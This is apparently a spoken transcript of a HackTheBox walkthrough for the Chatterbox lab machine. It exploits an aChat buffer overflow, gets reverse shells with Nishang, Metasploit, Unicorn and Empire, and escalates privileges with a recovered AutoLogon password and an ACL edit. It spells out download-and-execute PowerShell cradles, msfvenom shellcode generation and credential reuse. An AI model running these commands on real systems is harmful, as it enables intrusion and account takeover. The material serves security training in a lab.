What's going on YouTube? This is IppSec and we're doing Chatterbox from HackTheBox, which is a relatively easy machine, so you're probably wondering why this video is so long. Well, we're going to get user three different ways. The first way is getting it with Nashang, which isn't using Metasaploit. Then we're going to use Metasaploit. Then we're going to do PowerShell Empire. And then, once we get user all three times, we're going to be doing two different Privesc methods. The first method is going to be the intended method, which is a AutoLogon password that was hard-coded, and the second method is through root.txt being owned by Alfred, which is a low-privilege user, so we can issue a command to give ourselves read access to that file since we own it. So, yeah, that should be fun. But let's get into the box a little bit. I've got a lot of downvotes because it doesn't listen on any of the top 1,000 ports, so a lot of people thought the box was down. You have to do a full port scan to find the ports that aChat listens on, which is the application that is exploitable. And even if you find it, it may still be down because that exploit is a buffer overflow, and a lot of unexpected things can happen if you just keep mucking around with it. Hopefully it's a relatively stable one if you know what you're doing, because we're going to be using that buffer overflow quite a bit, and if I have to revert this box a lot, I'm going to be relatively upset. So let's find out how stable this is and jump in and begin. We're going to start off with the nmap, so nmap-sc for default scripts, sv enumerate versions, oa output all formats, put in the directory nmap, we'll call initial, then the IP address of Chatterbox, which is 10.10.10.74. This does take some time, so I've already ran it. Looking at the results, we see absolutely no ports are listening, but the host is online, so we know we got the correct IP because nmap says the host is up, because it did do a ping on 10.10.10.74. When that happens, I will do a nmap-p- that is all TCP ports 1 through 65,535. And then we'll do -oa to output all formats in the nmap directory and all ports.nmap. The IP address is 10.10.10.74, and this command does take some time, so I've already ran it. Looking at the results, we do see two ports are open, 9,255 and 9,256, and I will generally always do a nmap-p- after I did my first script scan. You can do -p- first, but I'm lazy and generally like doing things with one command. So, and if you wanted to, you could do -sc-sv with a -p-. It'll just take freaking forever. So let us do a nmap-p on 9255 and 9256, the two ports that are listening. Then do -sc-sv oa on nmap all port. We'll do nmap targeted on 10.10.10.74. Shouldn't take too long to run. I could have added like -n to not do a DNS reverse lookup, -t5 to make it aggressive, $Pn to make sure it doesn't do a ping, and that would speed it up a little bit more. And that's weird. We didn't get anything back from any ports. They're both TCP wrapped, which doesn't make sense to me. Something is fishy. Let's run that again, and we'll speed it up this time. But we should have got something other than TCP wrapped, because it means the port's online, but it just closed. There we go. We have one as HTTP, one as aChat, and we have HTTPD open. We could do also --script Vaughn to do a Vaughn scan, and I've never actually done this one in this box. I don't know if nmap has anything to detect that. So while that runs, let us go over to the IP address 10.10.10.74, and I forgot that has to be 9255. And my burp is configured to not intercept, so I'm not sure why that didn't go. 10.10.10.74 9255. We just get a complete blank page. If we wanted to, we could intercept this, send it to repeater. Firefox is acting funny. There we go. And we see the server's aChat, and then it just closes. A 204 no content. We could add things like robots.txt and see if it has files, or do a Go Buster on it. But I don't think we have to do that here. The scripts for vulnerabilities, didn't find anything, but let us just do a Searchsploit for aChat, since that is the server. This generally is like Nginx, IIS, Apache, but this being aChat is unique, so I searched it in Searchsploit, which is essentially exploit DB, just local to Kali, and you don't have to type a CAPTCHA. We see two things come back. We got a Metasaploit module and a Python module, so let's do this with Python first. So we can do Searchsploit-m for mirror. If you do -h, you can see everything. But I'm going to do -m, and then exploits Windows Remote 36025. So it copied that to my directory. So let's look at this exploit and see what it does. So they give us a MSFVenom command to generate some shellcode. This one is going to spawn calculator, then buffer. So this is what MSFVenom outputted. We see the server address connecting to, so let's change this to 10.10.10.74. The port is 9256. Here it's building the payload. This is probably doing something to set up the message, because it is an instant message. And here's where we're putting the thing from MSFVenom, the buffer. And it's going to look like it puts buff plus A and then times 1152 minus the length of the buffer. So let's see. 1152 is probably the maximum payload size that we can have. So if this goes beyond 1152 bytes, then our buffer is too big and the payload crashes. So we have to keep our shellcode below 1100 bytes. And that is about it. So let's do a WQ to write because we did change the IP address. And I'm going to grep MSFVenom out of 36025.py. And let us see what command we can run. So this is doing Windows exec. So let's look at other payloads we can do. So MSFVenom --list, and let's grep for PowerShell. There may be like a MSFVenom thing that does a reverse PowerShell query to us. And while that runs, let's copy all this output into our clipboard. We do have Windows PowerShell reverse TCP, and this is all underscores, so this means it is not a stage payload. So if this was like PowerShell / reverse TCP, then we'd have to do exploit handler because it makes it connect back to us, then sends it to payload, which then executes and sends it to us. So let us just do the PowerShell reverse TCP. So I'm going to paste what's in my clipboard, and then we'll change -p to be Windows PowerShell reverse TCP. And CMD is in an argument, lhost and lport is, so lhost equals 10.10.14, I want to say 30. Yep, 30 is my IP. And then we'll do lport is equal to 9001. Generate the payload. And, okay, that finished quicker than I could explain something. I just wanted to say, when you see like buffer register equals EAX, this means that's where the actual jump call should be. So once the buffer overflow happens, EAX is pointing to the buffer here. And you did that in your shellcode, I believe. If we looked at that 36025 and really debugged it, it would be doing something, and when the buffer overflow happens, EAX points to the memory address at your buffer. You also have encoding as Unicode and -B. This is a bad characters, so we don't want to send any of these characters through. Unfortunately, we have 15,000 bytes, which is bigger than 1100, so we can't use this payload. So what I'm going to do is let us go back to the original one, and it's off my clipboard now, so if we, that's not it. grep MSFVenom 36025. And instead of doing cmd equals calc.exe, I'm going to do a PowerShell command. So we'll do cmd equals, this is going to be tough. Tough because we have to do double quotes twice, which I hate doing because you have to escape one and it always does weirdness. So we'll do PowerShell, then IEX, new object, net.web client, download string, http 10.10.14.30 slash, we'll do please subscribe .ip. Extension doesn't matter when it comes to this. And backslash double quote to escape that, and then that. And enter, just because we want to go to a new line and it doesn't matter. So copy this command. And generally, I would do like a ping command or something first to make sure the exploit works. We're kind of jumping a little bit, going straight to PowerShell. But wonder if the exploit works by if it hits our web server. So while that runs, let us open a new window. And let's go to www. And let's copy Nashang. So opt, I think I have it in PowerShell, Nashang. And if you don't have this, just Google GitHub Nashang and then download it. But let's see, we want shells and invoke PowerShell tcp.ps1. And it gives us instructions, so we just want to do this command. Whoops. I always do dd to put a line in my clipboard, or whatever it is in VI, and then I can just do p to put it. There's more optimal ways to do it, but that's just how I do it. IP address is 10.10.14.30, and port we'll do 9002. Did I do 9001 already? I don't know if I did. Let's go back here. I don't think I did 9001. Nope. So 9002 is going to be where Shell comes. So we can copy this. VI on 36025, and we want to replace this buffer. I'm going to delete 50 lines with 50 DD, and then just get rid of this stuff. And then paste. I suppose we should change what an MSFVenom looks like for documentation purposes. Okay. So let's move invoke PowerShell to please subscribe.ip. Then we do Python simple HTTP server on port 80. And let's just send that to pane 1. And then we can execute this and hope for the best. P is not defined. We screwed something up. Go to line 70. While I in length P. I have no clue what I screwed up there. So let us -m to mirror this again, overwrite it, and maybe I delete an extra line. Oh, I deleted all this. This create UDP socket stuff. That's my bad. So 50 was too much. So we'll do 20 to delete 20 lines. And then delete the rest. So always be careful when deleting stuff out. You may delete too much. And then we have to change that IP again. '74. Run the exploit. We have it hitting please subscribe.ip. It gave us a HTTP 200. And we didn't start netcat. That is our bad. So split the pane again. Netcat LV NP 9002. And we'll try this again. Hit please subscribe. We get a connection. And we have a PowerShell session. So now we could go cd /cd, let's see, who am I? Chatterbox Alfred. So we go users, Alfred, desktop. And then you can do get content, user.txt, substring 016. And you just need get content. I do this so you can't see the whole flag. And I made an error. dir, user.txt. So get content, user.txt, .substring 0 to 16. My PowerShell wrong? Nope. There we go. Not sure what I did the first time, but had a weird error message. So there's the user flag. The very first thing generally I do on a box is either run Sherlock or PowerUp. I'm going to do PowerUp. So let's go back to a www directory, and then cp opt. Do I have it here? PowerSploit. Then Recon. Nope, Privesc. PowerUp. Copy that there, and before I do that, I'm just going to do whoami/all. And we can see what tokens we have, because a lot of our previous videos when we did Windows boxes, we wanted that SE impersonation token. And we don't really have any dangerous tokens on this one, so let us just do PowerUp. So IEX, new object, net.web client, download string, HTTP 10.10.14.30, PowerUp.ps1. Should be good. It got it. And notice we didn't get any output right away, and that's because unlike when I did the Nashang, I didn't put an invoke all checks here at the very bottom. So all we did was load all the PowerShell functions into memory. And the reason why I did it with the reverse shell is because I didn't want my payload to have to call a command after it downloads a file. I'd rather know it downloads the file and executes the file. I don't want that second command in between. For when I have a shell, it doesn't bother me. So I'm just going to do invoke all checks. And we'll see what that outputs. And if you wanted to, you could just like grep-i function, I think, and PowerUp, and see the various functions it has. So let's see. Let's go to the very top. Give it a capital. There we go. Where's my invoke all checks? That's where my /all. Okay, well, oh, here it is. Here's where our PowerUp begins. So we have a default password of welcome1 ! As a registry AutoLogon. And that is it. So let us try that password on other things. And because we don't have any ports listening on the box and we didn't use meterpreters, so it's a pain in the butt to forward a port, I'm just going to manually try different users. So I'm going to type net users, and we can see there are 3 users on the box: administrator, Alfred, and guest. So let us try running a command as administrator. To do that, we have to create a credential variable. Windows is a bit funny and doesn't like you passing passwords in plain text to a command. So let's create a variable for a password, convert this to a secure string. The password was welcome1, and I got that from the invoke all checks up here. And then we'll do as plain text, letting PowerShell know, yes, we know this is bad things by putting passwords in plain text, but do it anyways, and force it to do so. Then we can do a new variable called cred, and new object, system management automation, I think PS credential, and the username will be administrator, and the password will be a secure pass variable. If we do cred, we do see that variable, it has a username of administrator, and the password is some secure string. So we should be able to do Invoke-Command, think dash credential, cred, script block, do who am I. Let's see. That errored out. I did something wrong. Does it to be in quotes? Let's see. Does not like Invoke-Command. Maybe Invoke-Command requires PowerShell remoting. So let's try start process. Maybe that'll work. Start process, file path, PowerShell, argument list. Who am I? It won't give us any output. So let's just, I guess, hope for the best. Let's see. Go back here. If we can search for IX. That was weird. And we'll copy what we did before. And paste it in. I think I copied a new line character. That's annoying. Let's just finish typing it. See, argument list. We need a double quote there. HTTP 10.10.14.30. Shells for all .ps1. And then we can do that. Let's go over here. We'll move PowerUp.ps1 to be shells for all.ps1. Oh, not PowerUp. We'll copy please subscribe to be shells for all.ps1. And edit this and change this port to 9003. Listen on 9003, run this command, and our shell actually completely died. So 9002, let's get a shell again. Listen on 9003, and copy this and hope for the best. If this works, then we can add in the credential and see if we can do it as a different user. Position parameter cannot be found that accepts argument. Oh, so it looks like start process doesn't work like I thought it did. Because argument list is not accepting IEX. Let's see. Let's just try one last thing. I want to copy this. And then we're not going to do these backslash because I just realized that was completely unnecessary. Because I'm not needing to escape anything. Let's try this. No error message. We got the call, and we have a shell. Do who am I? We're Alfred, so let's do this again, but this time do the credential. So we will copy this to a clipboard, and then do secpass. Okay, and now we got to create the credential. Looks good. Mistype something. Let's redo this. System management PS credential. That's what I typed last time. Administrator secpass. See, cannot find system management PS credential. Oh, I'm forgetting automation. Oh, PowerShell's annoying. System management automation PS credential. There we go. Sorry about that. Okay. We can paste the command, and this time we can hope that start process a credential flag. If we start the process with a cred, we got a connection, and we administrator. So now we can go into users, administrator, desktop, and then get content on root.txt. And then we, of course, want to do a substring of 0 to 16. And there's the first 16 characters of that. The funny thing is, if we do a who am I as Alfred, and we go to, let's see, cd users administrator desktop, and we can actually get in this directory as Alfred. We are an admin right now, and if we tried to get this file, get content on root.txt, I'm still doing substring just in case someone left the box in a bad state. We can't. We can try to cat this file with type, and we have permission denied. So for some reason, we're allowed to access the administrator's home directory as Alfred. So what we can do is a Get-ACL, and then the directory like administrator. And I think we can pipe that to FL, which is, I want to say full list. I forget what FL is. But this has all the permissions on it. So, let's see. Where are we? Here we go. Access to string. NT authority system has full control. Administrators have full control. Administrator has full control. This is the groups. And then Alfred has full control. If we look at the owner is system. So if we go into administrator, we can look at the desktop and do the same thing on root.txt. So Get-ACL, root.txt, FL, stir. Forget what that is. Pretty sure that's full text or full length or something. Let's see. That's bothering me now. PowerShell, what is FL? PowerShell has a lot of weird abbreviations that once you use them, you kind of just forget about them. Format list. Yeah, the F means format, and then dash list. That's right. So format list, and we want to display everything in the list. But back to this, the Get-ACL on root.txt, we can see the access to string is only Chatterbox administrator, and Alfred is not here like he was on the folders. But if we look at the owner, Alfred actually owns this file. So there is a way to do this in PowerShell. It is a pain. You have to type a lot to do it for something that's relatively simple. We're going to do cacls, which is the command, like the old way to do it in command prompt. So if we just Google man cacls, we can see how to use them. So we're going to use the -t to search for the path name, the /e for edit ACL, and then we probably want to do /p to add a user and permission, and we want to do full control. So again, if we try to view, actually, we'll view it this way. root.txt, substring 016. We can't let us, where did I copy that? That just erased my standard out. That sucks. I was going to copy that, and we could show that I'm running the same exact command, but you'll just have to trust me, I guess, or type it yourself. So let's do cacls /t. Let's specify the file, root.txt, /e edit /p for permission, Alfred, and we'll give him full. And I think we just screwed something up. Let's cacls root.txt /t /e /p Alfred F. There we go. I don't know what I did before. Maybe it doesn't like the /t first. Yeah, I think it just doesn't like the /t first. Okay. But now if we do Get-ACL on root.txt and fl star, we can see access to string. Alfred has full control, so we can do get content root.txt substring 0 to 16 and view the file that way. So there's two different ways we could have done this box, and let us just remove those permissions so no one else can do it. So I think it was, let's see, we need /t and then /r. So r Alfred, and we want root.txt. Okay, process the file, and let's do a get content again. We can no longer get that file because we removed Alfred from the ACL. So to sum up this box, we started off with the nmap. We saw that the server was aChat. We used Searchsploit to look for vulnerabilities for a program named aChat. We saw one. We pulled the exploit code. Then we used MSFVenom to generate a exploit shellcode for the exploit so it could replace in the Python script. Then when we executed the Python script, we got a shell as Alfred. We saw there was a hard-coded password in the startup for Alfred, so he could auto-log into the box. So PowerUp will always display when you have a user that auto-logs in. The password has to be stored in Windows, so PowerUp pulled that password, and it was the same password as administrator, and that gave us access. Additionally, we had a second way in because Alfred had owned the file root.txt, so we could edit the ACLs on it. And before we conclude this video, we're going to do this box with Metasaploit and then potentially do it with Empire. So let us restart everything and do this with Empire. So exit, or not Empire, Metasaploit. Exit, exit, there we go. And go here. And I don't think my PostgreSQL database is started, so I'm going to start that because having the database up speeds up Metasaploit a lot when searching for things. Postgres had a typo. Then we can just do search aChat, and we find the aChat exploit. So let's use this. Show options. Set our host to be 10.10.10.74, and set lhost to be ton0. We'll set lport to be 9001. Run the exploit. And it should set up a listener and send this payload. No encoders encoded the buffer correctly. That's weird. Show options. lhost 10.10.14.30. That's correct. lport 9001. Set lport to be 901. Let's set the payload something. Payload Windows meterpreter reverse HTTP. Run. I'm not sure why that's giving an error message. That is odd. Let's see. Show advanced options. And let's see. Search for encoder. Enable stage encoding is all false. Yeah, I have no idea why that isn't working. I could have swore I've done this before. No encoder encoded. That is bizarre. 9256 process. Okay, well, let us just skip exploiting it like with Metasaploit like this and just go straight to Unicorn. I'm not exactly sure why that's erroring. So if we execute Unicorn, we can see its usage. So let's copy Python Unicorn. Then we can do 10.10, 14.30, and we'll do port 9001. It's generating the shellcode. And while that does that, let's set up. Whoops. I don't know what key I hit. Okay, well, it finished. So let us just move the files. So we'll move PowerShell attack into documents, HTTP, boxes. This is Chatterbox. And we'll move unicorn.rc there as well. So let us cat PowerShell attack. It's the PowerShell command to execute a interpreter payload with unicorn. So let's just move that into www please subscribe.ip. Then we can do MSF console -r unicorn.rc. Split a pane, go in www, and then do python-m simple HTTP server. Split it again, and we can do pyth. I don't know why I start my tmux and nmap. That is weird. But Python and execute manual buffer overflow. So this is going to trigger the exploit in aChat, which is going to go to a Python web server that we have to start on port 80. And then that's going to send it over to Metasaploit. So sent the exploit. We got please subscribe. And we didn't get anything over here. What's going on with Metasaploit? Oh, there we go. Just took a little bit. So session 1 is opened. So if we do sessions-i1, we can interact with it. We can do PS and get a list of all the processes. But most importantly, we can do post-exploitation modules. So we can search Windows, no, it's post Windows gather for like information gathering things. We can go to the top and then start going down this list. So not unintended, a bunch of post credential stuff, and Windows AutoLogon. We're going to cheat and just use this right off the bat. So if we use module, AutoLogon, or use, we don't do use module, that's Empire. Show options, we can set the session to 1, which is our meterpreter session. If we do sessions, we can see that. And then run this. Hopefully, it will tell us. Oh, Metasaploit is lying to us. There's definitely an AutoLogon password. Should always test things. Search. Password's probably a bad one to search for. Let's see. We can do smart hash dump. Maybe that'll do it. We can get lucky here. So use. We'll do set G, so session is always set to 1. Insufficient privilege. Well, this sucks. Windows gather AutoLogon use. I could have sworn that was the correct one to use. Let's see. Lapse, we don't want. So you can tell how much I use Metasaploit, because this should be something super simple, but I don't know. So what I'm going to do is do sessions-i1. We'll do load PowerShell, and then we will do PowerShell shell, and we can just do this exactly like we did before. So IEX, new object, net.webclient, download string, HTTP 10.10.14.30, PowerUp.ps1. I don't think I renamed it. Hopefully I didn't. Nope. Invoke all checks, and we'll get the same exact thing. This time, we'll do something a little bit different to get the second code execution. Maybe. It may fail on us. Okay, so we can see, invoke all checks. We found this password. So let's exit PowerShell, terminate the channel. Let's see, we want to do a PortFwd command. So PortFwd, let's see, forward-h, show the options. We want to do a local PortFwd, I believe. So PortFwd add-l. It's optional. Oh no, capital is optional. Lowercase. Local port to listen on. So we'll do 445. Then we want to forward that to port 445. And we want to say that goes to 127.0.0.1. Right? Hopefully that's right. If we did a shell, let's make sure we're listening on port 445. So netstat-an. TCP is listening on 445. So on our cacls now, if we did a netstat ALNP grep 445, we're listening, and Ruby is listening. So this is, when we connect to this port, it's going to send it through meterpreter. Let's go to whatever dash R was. So it's going to go to 127.0.0.1 after going through meterpreter, and then go into the port 445. So we should be able to background this and search for psexec and do like, let's see, use exploit Windows SMB psexec, show options, set our host to be 127.0.0.1, set SMB user, administrator, set SMB pass, welcome 1. If we exploit, we probably have to set lhost and stuff. So lhost ton 0, set lport 9002. Run this. It's going to start a listener and then try to do a SMB exec through localhost on port 445. So it's authenticating, selecting PowerShell as the method of execution, and attempted to execute the payload, but did not. That's weird. WinExe -h. So we want to do -u, administrator, welcome 1, CMD. 270.0.0.1. Login failure. So maybe I typed the password in wrong. That is totally possible. Welcome 1 exclamation point. That should be it. No, I typed that in right. Let's do, what's the host name of this guy? Let's see. Chatterbox. Still NT login failure. Administrator, welcome 1. We can't do that as Alfred because he's not an administrator. Let's see. Is there a run as in Metasaploit? Let's see. Search run as. Use. Nope. Maybe it's run underscore as. There we go. Post Windows manage run as. Let's try this one. Use this. Show options. Set CMD. Oh, that's annoying. PowerShell IX new object. Web client download string. And we'll do, what is it? 10.10.14.30 / please subscribe.ip. Okay, we'll hope that's good. Set user to administrator, set password to welcome 1. We've got session. Domain, we need that? Chatterbox. We didn't forget session because we set G-it to globally set it. Command ran. It hit it. I guess, whoops. Handler, show options. Oh, there we go. Session 2 is open. Session-i2. Get UID. And we're administrator. So I just forgot it takes a little bit to get it running. And as I did that, I remembered I normally use mpacket psexec. Packet dash. Is it wmi-exec? And then we can do, let's see, target will be let's put this in single quotes. Administrator at administrator : welcome1 at localhost, and we'll execute cmd. Connection diffused. Let's try psexec.py 127.0.0.1. Okay. So that works. I guess I erased localhost out of my etc host file. So that would be as administrator. And let's try that wmi-exec again. Because this should have worked. Nope. So you could do it with psexec. My etc host file. Yeah, I don't have localhost here. 127.0.0.1 localhost. So that's why I couldn't resolve localhost. It wasn't in my file. So that is how you do the box with Metasaploit. And I guess I do Empire. So let's shut down and exit again. And then we'll do it one last time. So we probably want to keep that dub there. Just run that server, because we're going to use the same please subscribe.ip file. So let's go to opt empire. Let's see. Actually, let's remove empire, and let's just get a fresh version. So GitHub empire. Git clone. CD empire. And we have to go into setup, install. Oh, it's changing libraries on my computer. This is going to take longer than I thought. Oh, my bad. I thought I used Empire more recently. Finally did all the package installation. We're just going to enter to do a random negotiation password. And now we just execute Empire. It should load. And we can start off with doing, I think, use listener. Or there's listeners. And now we can do use listener. And we can, after hitting space after use listener, you can do tabs and see the different listeners you have. We're going to do HTTP. And then hit tab a few more times. We don't have anything. So now we can do show options, or info, show options in Metasaploit. And we can see the different arguments we have. So we have to set the host to be HTTP 10.10.14.30. And we don't want to use port 80. We want to use port 443, I guess, because 80 is our simple HTTP server, so we don't want to overwrite that. And we also have to change the bind IP probably to 10.10.14.30. Do info again. Both options look like they changed, so we can do execute. Startup port failed because we didn't change set port to be 443. Execute. It'd be really nice if when you changed the host, it changed everything at once, but that's not the case. So now after we do this, we should be able to maybe go stager. Let's see, what options do we have here? Not there. Options here. One of them was like use stager. There we go. Use stager. And that's not it. Interact listeners, load plugins. We could, these are a bunch of different stages, like if we want to do an HTA file or things like that. But one of them was just give us PowerShell. Let's see. Listeners, creds, use listener, HTTP. Launcher. Launcher when you're in the actual listener menu. And then we can do launcher PowerShell to give us the PowerShell command. So if we copy this, and then we can go to the please subscribe.ip. Instead of launching the thing that came out of Unicorn, we paste the thing that came out of Empire. I don't know why I exited that. Now we can just do Python the exploit, which is going to make us hit that please subscribe, which then executes Empire. So if we do agents, we now have an agent. We can do interact. And you could do all or just specify the agent you want to interact with. You can do info again to see some stats. Double tab to see commands you can do. But we want to do search module. And I think PowerUp is a module actually. So there we go. So let's use module. Oh, crap. Help. Let's go back. Back. Use module here. Use module. Oh. When you do use module, I don't think you can do. This is weird. I'm doing something silly. It's hard to switch between both nothing, Metasaploit, and straight to Empire. Let's do agents, interact, use module is a thing, and we don't specify PowerShell. We just do Privesc PowerUp all checks because it's a PowerShell agent, so you ignore that very first thing. Then we can do info and see what we can do. The agent to run it on is the correct one, so we just execute it and we task that agent to run it. Valid results returned. Info. Oh, we should have got the results. If we interact with it again, do we get it? No, don't exit. Interact. Okay, once we interact with it again, we get the actual results. And we can see the same exact thing we've always seen is Alfred and welcome run. So let us search module, and we'll just search for run to see if we can find one that has like run as. Search risk Ghastly. Run as. Okay. PowerShell management run as. So let's use module management run as because PowerShell is assumed with the PowerShell agent. Do info. Set username to be administrator. Administrator. Yep. Set domain to be Chatterbox. Set password to be welcome1. Set CMD to be PowerShell. And set arguments to be IX new object net web client. Download string. RIP. Please subscribe.ip. Make sure we're still listening on HTTP. We are. If we execute this, we can see we got to hit back. We got a new agent. So if we do agents, we have Alfred and administrator. And this administrator has this wildcard because I believe that means it's UAC bypassed. So it's administrator running in administrator context. So that is, I guess, a quick primer on how to use Empire. I did this in the blue video a few months ago, so I'd made less mistakes back then. You may want to check that video out if you liked Empire. But yeah, take care, guys, and I will see you next week.